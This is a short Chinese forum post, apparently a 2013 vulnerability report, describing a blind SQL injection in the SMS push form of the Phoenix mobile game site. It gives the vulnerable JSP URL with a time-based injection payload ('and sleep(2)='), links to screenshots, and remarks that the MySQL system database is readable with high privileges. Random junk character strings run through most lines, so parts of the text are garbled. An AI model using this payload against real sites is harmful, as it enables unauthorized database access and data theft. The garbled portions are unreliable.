简要描述:. b, `7 X L+ K( i w
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
0 q$ B, P% P) a! r _- a) p% K& x3 t1 j/ Q$ l9 W0 ?# J
详细说明:7 Y" ^2 f4 @( }3 k* j
存在SQL盲注url:+ m) p3 Y0 o" H( M" G
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=17 O. M9 ?6 u3 N7 ], { o7 v+ c/ h
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
1 j- A$ o7 G5 T+ S( J ?0 vhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
! q2 c* n3 ]( ?6 k% w% T" V7 t/ xhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg' L7 m& @3 F) ]0 ]9 I% }: d
+ V3 y$ k4 X% g* d
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
分享
支持
反对